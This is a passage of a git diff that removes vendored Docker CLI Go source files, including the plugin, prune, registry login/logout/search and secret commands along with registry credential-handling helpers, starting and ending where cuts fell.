-		reader := bufio.NewReader(dockerCli.In())
-		line, _, err := reader.ReadLine()
-		if err != nil {
-			return false, err
-		}
-		return strings.ToLower(string(line)) == "y", nil
-	}
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/list.go b/vendor/github.com/docker/docker/cli/command/plugin/list.go
deleted file mode 100644
index 8fd16dae3f..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/list.go
+++ /dev/null
@@ -1,63 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-	"strings"
-	"text/tabwriter"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/stringid"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type listOptions struct {
-	noTrunc bool
-}
-
-func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts listOptions
-
-	cmd := &cobra.Command{
-		Use:     "ls [OPTIONS]",
-		Short:   "List plugins",
-		Aliases: []string{"list"},
-		Args:    cli.NoArgs,
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runList(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
-
-	return cmd
-}
-
-func runList(dockerCli *command.DockerCli, opts listOptions) error {
-	plugins, err := dockerCli.Client().PluginList(context.Background())
-	if err != nil {
-		return err
-	}
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
-	fmt.Fprintf(w, "ID \tNAME \tDESCRIPTION\tENABLED")
-	fmt.Fprintf(w, "\n")
-
-	for _, p := range plugins {
-		id := p.ID
-		desc := strings.Replace(p.Config.Description, "\n", " ", -1)
-		desc = strings.Replace(desc, "\r", " ", -1)
-		if !opts.noTrunc {
-			id = stringid.TruncateID(p.ID)
-			desc = stringutils.Ellipsis(desc, 45)
-		}
-
-		fmt.Fprintf(w, "%s\t%s\t%s\t%v\n", id, p.Name, desc, p.Enabled)
-	}
-	w.Flush()
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/push.go b/vendor/github.com/docker/docker/cli/command/plugin/push.go
deleted file mode 100644
index 9abb38ec0b..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/push.go
+++ /dev/null
@@ -1,71 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/image"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-)
-
-func newPushCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "push [OPTIONS] PLUGIN[:TAG]",
-		Short: "Push a plugin to a registry",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return runPush(dockerCli, args[0])
-		},
-	}
-
-	flags := cmd.Flags()
-
-	command.AddTrustedFlags(flags, true)
-
-	return cmd
-}
-
-func runPush(dockerCli *command.DockerCli, name string) error {
-	named, err := reference.ParseNamed(name) // FIXME: validate
-	if err != nil {
-		return err
-	}
-	if reference.IsNameOnly(named) {
-		named = reference.WithDefaultTag(named)
-	}
-	ref, ok := named.(reference.NamedTagged)
-	if !ok {
-		return fmt.Errorf("invalid name: %s", named.String())
-	}
-
-	ctx := context.Background()
-
-	repoInfo, err := registry.ParseRepositoryInfo(named)
-	if err != nil {
-		return err
-	}
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
-
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return err
-	}
-	responseBody, err := dockerCli.Client().PluginPush(ctx, ref.String(), encodedAuth)
-	if err != nil {
-		return err
-	}
-	defer responseBody.Close()
-
-	if command.IsTrusted() {
-		repoInfo.Class = "plugin"
-		return image.PushTrustedReference(dockerCli, repoInfo, named, authConfig, responseBody)
-	}
-
-	return jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/remove.go b/vendor/github.com/docker/docker/cli/command/plugin/remove.go
deleted file mode 100644
index 9f3aba9a01..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/remove.go
+++ /dev/null
@@ -1,55 +0,0 @@
-package plugin
-
-import (
-	"fmt"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type rmOptions struct {
-	force bool
-
-	plugins []string
-}
-
-func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts rmOptions
-
-	cmd := &cobra.Command{
-		Use:     "rm [OPTIONS] PLUGIN [PLUGIN...]",
-		Short:   "Remove one or more plugins",
-		Aliases: []string{"remove"},
-		Args:    cli.RequiresMinArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.plugins = args
-			return runRemove(dockerCli, &opts)
-		},
-	}
-
-	flags := cmd.Flags()
-	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of an active plugin")
-	return cmd
-}
-
-func runRemove(dockerCli *command.DockerCli, opts *rmOptions) error {
-	ctx := context.Background()
-
-	var errs cli.Errors
-	for _, name := range opts.plugins {
-		// TODO: pass names to api instead of making multiple api calls
-		if err := dockerCli.Client().PluginRemove(ctx, name, types.PluginRemoveOptions{Force: opts.force}); err != nil {
-			errs = append(errs, err)
-			continue
-		}
-		fmt.Fprintln(dockerCli.Out(), name)
-	}
-	// Do not simplify to `return errs` because even if errs == nil, it is not a nil-error interface value.
-	if errs != nil {
-		return errs
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/set.go b/vendor/github.com/docker/docker/cli/command/plugin/set.go
deleted file mode 100644
index 52b09fb500..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/set.go
+++ /dev/null
@@ -1,22 +0,0 @@
-package plugin
-
-import (
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-func newSetCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "set PLUGIN KEY=VALUE [KEY=VALUE...]",
-		Short: "Change settings for a plugin",
-		Args:  cli.RequiresMinArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			return dockerCli.Client().PluginSet(context.Background(), args[0], args[1:])
-		},
-	}
-
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go b/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
deleted file mode 100644
index d212cd7e52..0000000000
--- a/vendor/github.com/docker/docker/cli/command/plugin/upgrade.go
+++ /dev/null
@@ -1,100 +0,0 @@
-package plugin
-
-import (
-	"bufio"
-	"context"
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/pkg/jsonmessage"
-	"github.com/docker/docker/reference"
-	"github.com/pkg/errors"
-	"github.com/spf13/cobra"
-)
-
-func newUpgradeCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var options pluginOptions
-	cmd := &cobra.Command{
-		Use:   "upgrade [OPTIONS] PLUGIN [REMOTE]",
-		Short: "Upgrade an existing plugin",
-		Args:  cli.RequiresRangeArgs(1, 2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			options.localName = args[0]
-			if len(args) == 2 {
-				options.remote = args[1]
-			}
-			return runUpgrade(dockerCli, options)
-		},
-	}
-
-	flags := cmd.Flags()
-	loadPullFlags(&options, flags)
-	flags.BoolVar(&options.skipRemoteCheck, "skip-remote-check", false, "Do not check if specified remote plugin matches existing plugin image")
-	return cmd
-}
-
-func runUpgrade(dockerCli *command.DockerCli, opts pluginOptions) error {
-	ctx := context.Background()
-	p, _, err := dockerCli.Client().PluginInspectWithRaw(ctx, opts.localName)
-	if err != nil {
-		return fmt.Errorf("error reading plugin data: %v", err)
-	}
-
-	if p.Enabled {
-		return fmt.Errorf("the plugin must be disabled before upgrading")
-	}
-
-	opts.localName = p.Name
-	if opts.remote == "" {
-		opts.remote = p.PluginReference
-	}
-	remote, err := reference.ParseNamed(opts.remote)
-	if err != nil {
-		return errors.Wrap(err, "error parsing remote upgrade image reference")
-	}
-	remote = reference.WithDefaultTag(remote)
-
-	old, err := reference.ParseNamed(p.PluginReference)
-	if err != nil {
-		return errors.Wrap(err, "error parsing current image reference")
-	}
-	old = reference.WithDefaultTag(old)
-
-	fmt.Fprintf(dockerCli.Out(), "Upgrading plugin %s from %s to %s\n", p.Name, old, remote)
-	if !opts.skipRemoteCheck && remote.String() != old.String() {
-		_, err := fmt.Fprint(dockerCli.Out(), "Plugin images do not match, are you sure? ")
-		if err != nil {
-			return errors.Wrap(err, "error writing to stdout")
-		}
-
-		rdr := bufio.NewReader(dockerCli.In())
-		line, _, err := rdr.ReadLine()
-		if err != nil {
-			return errors.Wrap(err, "error reading from stdin")
-		}
-		if strings.ToLower(string(line)) != "y" {
-			return errors.New("canceling upgrade request")
-		}
-	}
-
-	options, err := buildPullConfig(ctx, dockerCli, opts, "plugin upgrade")
-	if err != nil {
-		return err
-	}
-
-	responseBody, err := dockerCli.Client().PluginUpgrade(ctx, opts.localName, options)
-	if err != nil {
-		if strings.Contains(err.Error(), "target is image") {
-			return errors.New(err.Error() + " - Use `docker image pull`")
-		}
-		return err
-	}
-	defer responseBody.Close()
-	if err := jsonmessage.DisplayJSONMessagesToStream(responseBody, dockerCli.Out(), nil); err != nil {
-		return err
-	}
-	fmt.Fprintf(dockerCli.Out(), "Upgraded plugin %s to %s\n", opts.localName, opts.remote) // todo: return proper values from the API for this result
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/prune/prune.go b/vendor/github.com/docker/docker/cli/command/prune/prune.go
deleted file mode 100644
index a022487fd6..0000000000
--- a/vendor/github.com/docker/docker/cli/command/prune/prune.go
+++ /dev/null
@@ -1,50 +0,0 @@
-package prune
-
-import (
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/cli/command/container"
-	"github.com/docker/docker/cli/command/image"
-	"github.com/docker/docker/cli/command/network"
-	"github.com/docker/docker/cli/command/volume"
-	"github.com/spf13/cobra"
-)
-
-// NewContainerPruneCommand returns a cobra prune command for containers
-func NewContainerPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return container.NewPruneCommand(dockerCli)
-}
-
-// NewVolumePruneCommand returns a cobra prune command for volumes
-func NewVolumePruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return volume.NewPruneCommand(dockerCli)
-}
-
-// NewImagePruneCommand returns a cobra prune command for images
-func NewImagePruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return image.NewPruneCommand(dockerCli)
-}
-
-// NewNetworkPruneCommand returns a cobra prune command for Networks
-func NewNetworkPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
-	return network.NewPruneCommand(dockerCli)
-}
-
-// RunContainerPrune executes a prune command for containers
-func RunContainerPrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	return container.RunPrune(dockerCli)
-}
-
-// RunVolumePrune executes a prune command for volumes
-func RunVolumePrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	return volume.RunPrune(dockerCli)
-}
-
-// RunImagePrune executes a prune command for images
-func RunImagePrune(dockerCli *command.DockerCli, all bool) (uint64, string, error) {
-	return image.RunPrune(dockerCli, all)
-}
-
-// RunNetworkPrune executes a prune command for networks
-func RunNetworkPrune(dockerCli *command.DockerCli) (uint64, string, error) {
-	return network.RunPrune(dockerCli)
-}
diff --git a/vendor/github.com/docker/docker/cli/command/registry.go b/vendor/github.com/docker/docker/cli/command/registry.go
deleted file mode 100644
index 65f6b3309e..0000000000
--- a/vendor/github.com/docker/docker/cli/command/registry.go
+++ /dev/null
@@ -1,186 +0,0 @@
-package command
-
-import (
-	"bufio"
-	"encoding/base64"
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"runtime"
-	"strings"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/pkg/term"
-	"github.com/docker/docker/reference"
-	"github.com/docker/docker/registry"
-)
-
-// ElectAuthServer returns the default registry to use (by asking the daemon)
-func ElectAuthServer(ctx context.Context, cli *DockerCli) string {
-	// The daemon `/info` endpoint informs us of the default registry being
-	// used. This is essential in cross-platforms environment, where for
-	// example a Linux client might be interacting with a Windows daemon, hence
-	// the default registry URL might be Windows specific.
-	serverAddress := registry.IndexServer
-	if info, err := cli.Client().Info(ctx); err != nil {
-		fmt.Fprintf(cli.Out(), "Warning: failed to get default registry endpoint from daemon (%v). Using system default: %s\n", err, serverAddress)
-	} else {
-		serverAddress = info.IndexServerAddress
-	}
-	return serverAddress
-}
-
-// EncodeAuthToBase64 serializes the auth configuration as JSON base64 payload
-func EncodeAuthToBase64(authConfig types.AuthConfig) (string, error) {
-	buf, err := json.Marshal(authConfig)
-	if err != nil {
-		return "", err
-	}
-	return base64.URLEncoding.EncodeToString(buf), nil
-}
-
-// RegistryAuthenticationPrivilegedFunc returns a RequestPrivilegeFunc from the specified registry index info
-// for the given command.
-func RegistryAuthenticationPrivilegedFunc(cli *DockerCli, index *registrytypes.IndexInfo, cmdName string) types.RequestPrivilegeFunc {
-	return func() (string, error) {
-		fmt.Fprintf(cli.Out(), "\nPlease login prior to %s:\n", cmdName)
-		indexServer := registry.GetAuthConfigKey(index)
-		isDefaultRegistry := indexServer == ElectAuthServer(context.Background(), cli)
-		authConfig, err := ConfigureAuth(cli, "", "", indexServer, isDefaultRegistry)
-		if err != nil {
-			return "", err
-		}
-		return EncodeAuthToBase64(authConfig)
-	}
-}
-
-// ResolveAuthConfig is like registry.ResolveAuthConfig, but if using the
-// default index, it uses the default index name for the daemon's platform,
-// not the client's platform.
-func ResolveAuthConfig(ctx context.Context, cli *DockerCli, index *registrytypes.IndexInfo) types.AuthConfig {
-	configKey := index.Name
-	if index.Official {
-		configKey = ElectAuthServer(ctx, cli)
-	}
-
-	a, _ := cli.CredentialsStore(configKey).Get(configKey)
-	return a
-}
-
-// ConfigureAuth returns an AuthConfig from the specified user, password and server.
-func ConfigureAuth(cli *DockerCli, flUser, flPassword, serverAddress string, isDefaultRegistry bool) (types.AuthConfig, error) {
-	// On Windows, force the use of the regular OS stdin stream. Fixes #14336/#14210
-	if runtime.GOOS == "windows" {
-		cli.in = NewInStream(os.Stdin)
-	}
-
-	if !isDefaultRegistry {
-		serverAddress = registry.ConvertToHostname(serverAddress)
-	}
-
-	authconfig, err := cli.CredentialsStore(serverAddress).Get(serverAddress)
-	if err != nil {
-		return authconfig, err
-	}
-
-	// Some links documenting this:
-	// - https://code.google.com/archive/p/mintty/issues/56
-	// - https://github.com/docker/docker/issues/15272
-	// - https://mintty.github.io/ (compatibility)
-	// Linux will hit this if you attempt `cat | docker login`, and Windows
-	// will hit this if you attempt docker login from mintty where stdin
-	// is a pipe, not a character based console.
-	if flPassword == "" && !cli.In().IsTerminal() {
-		return authconfig, fmt.Errorf("Error: Cannot perform an interactive login from a non TTY device")
-	}
-
-	authconfig.Username = strings.TrimSpace(authconfig.Username)
-
-	if flUser = strings.TrimSpace(flUser); flUser == "" {
-		if isDefaultRegistry {
-			// if this is a default registry (docker hub), then display the following message.
-			fmt.Fprintln(cli.Out(), "Login with your Docker ID to push and pull images from Docker Hub. If you don't have a Docker ID, head over to https://hub.docker.com to create one.")
-		}
-		promptWithDefault(cli.Out(), "Username", authconfig.Username)
-		flUser = readInput(cli.In(), cli.Out())
-		flUser = strings.TrimSpace(flUser)
-		if flUser == "" {
-			flUser = authconfig.Username
-		}
-	}
-	if flUser == "" {
-		return authconfig, fmt.Errorf("Error: Non-null Username Required")
-	}
-	if flPassword == "" {
-		oldState, err := term.SaveState(cli.In().FD())
-		if err != nil {
-			return authconfig, err
-		}
-		fmt.Fprintf(cli.Out(), "Password: ")
-		term.DisableEcho(cli.In().FD(), oldState)
-
-		flPassword = readInput(cli.In(), cli.Out())
-		fmt.Fprint(cli.Out(), "\n")
-
-		term.RestoreTerminal(cli.In().FD(), oldState)
-		if flPassword == "" {
-			return authconfig, fmt.Errorf("Error: Password Required")
-		}
-	}
-
-	authconfig.Username = flUser
-	authconfig.Password = flPassword
-	authconfig.ServerAddress = serverAddress
-	authconfig.IdentityToken = ""
-
-	return authconfig, nil
-}
-
-func readInput(in io.Reader, out io.Writer) string {
-	reader := bufio.NewReader(in)
-	line, _, err := reader.ReadLine()
-	if err != nil {
-		fmt.Fprintln(out, err.Error())
-		os.Exit(1)
-	}
-	return string(line)
-}
-
-func promptWithDefault(out io.Writer, prompt string, configDefault string) {
-	if configDefault == "" {
-		fmt.Fprintf(out, "%s: ", prompt)
-	} else {
-		fmt.Fprintf(out, "%s (%s): ", prompt, configDefault)
-	}
-}
-
-// RetrieveAuthTokenFromImage retrieves an encoded auth token given a complete image
-func RetrieveAuthTokenFromImage(ctx context.Context, cli *DockerCli, image string) (string, error) {
-	// Retrieve encoded auth token from the image reference
-	authConfig, err := resolveAuthConfigFromImage(ctx, cli, image)
-	if err != nil {
-		return "", err
-	}
-	encodedAuth, err := EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return "", err
-	}
-	return encodedAuth, nil
-}
-
-// resolveAuthConfigFromImage retrieves that AuthConfig using the image string
-func resolveAuthConfigFromImage(ctx context.Context, cli *DockerCli, image string) (types.AuthConfig, error) {
-	registryRef, err := reference.ParseNamed(image)
-	if err != nil {
-		return types.AuthConfig{}, err
-	}
-	repoInfo, err := registry.ParseRepositoryInfo(registryRef)
-	if err != nil {
-		return types.AuthConfig{}, err
-	}
-	return ResolveAuthConfig(ctx, cli, repoInfo.Index), nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/login.go b/vendor/github.com/docker/docker/cli/command/registry/login.go
deleted file mode 100644
index 05b3bb03b2..0000000000
--- a/vendor/github.com/docker/docker/cli/command/registry/login.go
+++ /dev/null
@@ -1,85 +0,0 @@
-package registry
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/spf13/cobra"
-)
-
-type loginOptions struct {
-	serverAddress string
-	user          string
-	password      string
-	email         string
-}
-
-// NewLoginCommand creates a new `docker login` command
-func NewLoginCommand(dockerCli *command.DockerCli) *cobra.Command {
-	var opts loginOptions
-
-	cmd := &cobra.Command{
-		Use:   "login [OPTIONS] [SERVER]",
-		Short: "Log in to a Docker registry",
-		Long:  "Log in to a Docker registry.\nIf no server is specified, the default is defined by the daemon.",
-		Args:  cli.RequiresMaxArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			if len(args) > 0 {
-				opts.serverAddress = args[0]
-			}
-			return runLogin(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.StringVarP(&opts.user, "username", "u", "", "Username")
-	flags.StringVarP(&opts.password, "password", "p", "", "Password")
-
-	// Deprecated in 1.11: Should be removed in docker 1.14
-	flags.StringVarP(&opts.email, "email", "e", "", "Email")
-	flags.MarkDeprecated("email", "will be removed in 1.14.")
-
-	return cmd
-}
-
-func runLogin(dockerCli *command.DockerCli, opts loginOptions) error {
-	ctx := context.Background()
-	clnt := dockerCli.Client()
-
-	var (
-		serverAddress string
-		authServer    = command.ElectAuthServer(ctx, dockerCli)
-	)
-	if opts.serverAddress != "" {
-		serverAddress = opts.serverAddress
-	} else {
-		serverAddress = authServer
-	}
-
-	isDefaultRegistry := serverAddress == authServer
-
-	authConfig, err := command.ConfigureAuth(dockerCli, opts.user, opts.password, serverAddress, isDefaultRegistry)
-	if err != nil {
-		return err
-	}
-	response, err := clnt.RegistryLogin(ctx, authConfig)
-	if err != nil {
-		return err
-	}
-	if response.IdentityToken != "" {
-		authConfig.Password = ""
-		authConfig.IdentityToken = response.IdentityToken
-	}
-	if err := dockerCli.CredentialsStore(serverAddress).Store(authConfig); err != nil {
-		return fmt.Errorf("Error saving credentials: %v", err)
-	}
-
-	if response.Status != "" {
-		fmt.Fprintln(dockerCli.Out(), response.Status)
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/logout.go b/vendor/github.com/docker/docker/cli/command/registry/logout.go
deleted file mode 100644
index 877e60e8cc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/registry/logout.go
+++ /dev/null
@@ -1,77 +0,0 @@
-package registry
-
-import (
-	"fmt"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-)
-
-// NewLogoutCommand creates a new `docker login` command
-func NewLogoutCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "logout [SERVER]",
-		Short: "Log out from a Docker registry",
-		Long:  "Log out from a Docker registry.\nIf no server is specified, the default is defined by the daemon.",
-		Args:  cli.RequiresMaxArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			var serverAddress string
-			if len(args) > 0 {
-				serverAddress = args[0]
-			}
-			return runLogout(dockerCli, serverAddress)
-		},
-	}
-
-	return cmd
-}
-
-func runLogout(dockerCli *command.DockerCli, serverAddress string) error {
-	ctx := context.Background()
-	var isDefaultRegistry bool
-
-	if serverAddress == "" {
-		serverAddress = command.ElectAuthServer(ctx, dockerCli)
-		isDefaultRegistry = true
-	}
-
-	var (
-		loggedIn        bool
-		regsToLogout    []string
-		hostnameAddress = serverAddress
-		regsToTry       = []string{serverAddress}
-	)
-	if !isDefaultRegistry {
-		hostnameAddress = registry.ConvertToHostname(serverAddress)
-		// the tries below are kept for backward compatibility where a user could have
-		// saved the registry in one of the following format.
-		regsToTry = append(regsToTry, hostnameAddress, "http://"+hostnameAddress, "https://"+hostnameAddress)
-	}
-
-	// check if we're logged in based on the records in the config file
-	// which means it couldn't have user/pass cause they may be in the creds store
-	for _, s := range regsToTry {
-		if _, ok := dockerCli.ConfigFile().AuthConfigs[s]; ok {
-			loggedIn = true
-			regsToLogout = append(regsToLogout, s)
-		}
-	}
-
-	if !loggedIn {
-		fmt.Fprintf(dockerCli.Out(), "Not logged in to %s\n", hostnameAddress)
-		return nil
-	}
-
-	fmt.Fprintf(dockerCli.Out(), "Removing login credentials for %s\n", hostnameAddress)
-	for _, r := range regsToLogout {
-		if err := dockerCli.CredentialsStore(r).Erase(r); err != nil {
-			fmt.Fprintf(dockerCli.Err(), "WARNING: could not erase credentials: %v\n", err)
-		}
-	}
-
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/command/registry/search.go b/vendor/github.com/docker/docker/cli/command/registry/search.go
deleted file mode 100644
index 124b4ae6cc..0000000000
--- a/vendor/github.com/docker/docker/cli/command/registry/search.go
+++ /dev/null
@@ -1,126 +0,0 @@
-package registry
-
-import (
-	"fmt"
-	"sort"
-	"strings"
-	"text/tabwriter"
-
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api/types"
-	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/stringutils"
-	"github.com/docker/docker/registry"
-	"github.com/spf13/cobra"
-)
-
-type searchOptions struct {
-	term    string
-	noTrunc bool
-	limit   int
-	filter  opts.FilterOpt
-
-	// Deprecated
-	stars     uint
-	automated bool
-}
-
-// NewSearchCommand creates a new `docker search` command
-func NewSearchCommand(dockerCli *command.DockerCli) *cobra.Command {
-	opts := searchOptions{filter: opts.NewFilterOpt()}
-
-	cmd := &cobra.Command{
-		Use:   "search [OPTIONS] TERM",
-		Short: "Search the Docker Hub for images",
-		Args:  cli.ExactArgs(1),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			opts.term = args[0]
-			return runSearch(dockerCli, opts)
-		},
-	}
-
-	flags := cmd.Flags()
-
-	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
-	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
-	flags.IntVar(&opts.limit, "limit", registry.DefaultSearchLimit, "Max number of search results")
-
-	flags.BoolVar(&opts.automated, "automated", false, "Only show automated builds")
-	flags.UintVarP(&opts.stars, "stars", "s", 0, "Only displays with at least x stars")
-
-	flags.MarkDeprecated("automated", "use --filter=automated=true instead")
-	flags.MarkDeprecated("stars", "use --filter=stars=3 instead")
-
-	return cmd
-}
-
-func runSearch(dockerCli *command.DockerCli, opts searchOptions) error {
-	indexInfo, err := registry.ParseSearchIndexInfo(opts.term)
-	if err != nil {
-		return err
-	}
-
-	ctx := context.Background()
-
-	authConfig := command.ResolveAuthConfig(ctx, dockerCli, indexInfo)
-	requestPrivilege := command.RegistryAuthenticationPrivilegedFunc(dockerCli, indexInfo, "search")
-
-	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
-	if err != nil {
-		return err
-	}
-
-	options := types.ImageSearchOptions{
-		RegistryAuth:  encodedAuth,
-		PrivilegeFunc: requestPrivilege,
-		Filters:       opts.filter.Value(),
-		Limit:         opts.limit,
-	}
-
-	clnt := dockerCli.Client()
-
-	unorderedResults, err := clnt.ImageSearch(ctx, opts.term, options)
-	if err != nil {
-		return err
-	}
-
-	results := searchResultsByStars(unorderedResults)
-	sort.Sort(results)
-
-	w := tabwriter.NewWriter(dockerCli.Out(), 10, 1, 3, ' ', 0)
-	fmt.Fprintf(w, "NAME\tDESCRIPTION\tSTARS\tOFFICIAL\tAUTOMATED\n")
-	for _, res := range results {
-		// --automated and -s, --stars are deprecated since Docker 1.12
-		if (opts.automated && !res.IsAutomated) || (int(opts.stars) > res.StarCount) {
-			continue
-		}
-		desc := strings.Replace(res.Description, "\n", " ", -1)
-		desc = strings.Replace(desc, "\r", " ", -1)
-		if !opts.noTrunc {
-			desc = stringutils.Ellipsis(desc, 45)
-		}
-		fmt.Fprintf(w, "%s\t%s\t%d\t", res.Name, desc, res.StarCount)
-		if res.IsOfficial {
-			fmt.Fprint(w, "[OK]")
-
-		}
-		fmt.Fprint(w, "\t")
-		if res.IsAutomated {
-			fmt.Fprint(w, "[OK]")
-		}
-		fmt.Fprint(w, "\n")
-	}
-	w.Flush()
-	return nil
-}
-
-// SearchResultsByStars sorts search results in descending order by number of stars.
-type searchResultsByStars []registrytypes.SearchResult
-
-func (r searchResultsByStars) Len() int           { return len(r) }
-func (r searchResultsByStars) Swap(i, j int)      { r[i], r[j] = r[j], r[i] }
-func (r searchResultsByStars) Less(i, j int) bool { return r[j].StarCount < r[i].StarCount }
diff --git a/vendor/github.com/docker/docker/cli/command/secret/cmd.go b/vendor/github.com/docker/docker/cli/command/secret/cmd.go
deleted file mode 100644
index 79e669858c..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/cmd.go
+++ /dev/null
@@ -1,25 +0,0 @@
-package secret
-
-import (
-	"github.com/spf13/cobra"
-
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-)
-
-// NewSecretCommand returns a cobra command for `secret` subcommands
-func NewSecretCommand(dockerCli *command.DockerCli) *cobra.Command {
-	cmd := &cobra.Command{
-		Use:   "secret",
-		Short: "Manage Docker secrets",
-		Args:  cli.NoArgs,
-		RunE:  dockerCli.ShowHelp,
-	}
-	cmd.AddCommand(
-		newSecretListCommand(dockerCli),
-		newSecretCreateCommand(dockerCli),
-		newSecretInspectCommand(dockerCli),
-		newSecretRemoveCommand(dockerCli),
-	)
-	return cmd
-}
diff --git a/vendor/github.com/docker/docker/cli/command/secret/create.go b/vendor/github.com/docker/docker/cli/command/secret/create.go
deleted file mode 100644
index f4683a60f5..0000000000
--- a/vendor/github.com/docker/docker/cli/command/secret/create.go
+++ /dev/null
@@ -1,79 +0,0 @@
-package secret
-
-import (
-	"fmt"
-	"io"
-	"io/ioutil"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cli"
-	"github.com/docker/docker/cli/command"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/pkg/system"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/spf13/cobra"
-	"golang.org/x/net/context"
-)
-
-type createOptions struct {
-	name   string
-	file   string
-	labels opts.ListOpts
-}
-
-func newSecretCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
-	createOpts := createOptions{
-		labels: opts.NewListOpts(runconfigopts.ValidateEnv),
-	}
-
-	cmd := &cobra.Command{
-		Use:   "create [OPTIONS] SECRET file|-",
-		Short: "Create a secret from a file or STDIN as content",
-		Args:  cli.ExactArgs(2),
-		RunE: func(cmd *cobra.Command, args []string) error {
-			createOpts.name = args[0]
-			createOpts.file = args[1]
-			return runSecretCreate(dockerCli, createOpts)
-		},
-	}
-	flags := cmd.Flags()
-	flags.VarP(&createOpts.labels, "label", "l", "Secret labels")
-
-	return cmd
-}
-
-func runSecretCreate(dockerCli *command.DockerCli, options createOptions) error {
-	client := dockerCli.Client()
-	ctx := context.Background()
-
-	var in io.Reader = dockerCli.In()
-	if options.file != "-" {
-		file, err := system.OpenSequential(options.file)
-		if err != nil {
-			return err
-		}
-		in = file
-		defer file.Close()
-	}
-
-	secretData, err := ioutil.ReadAll(in)
-	if err != nil {
-		return fmt.Errorf("Error reading content from %q: %v", options.file, err)
-	}
-
-	spec := swarm.SecretSpec{
-		Annotations: swarm.Annotations{
-			Name:   options.name,
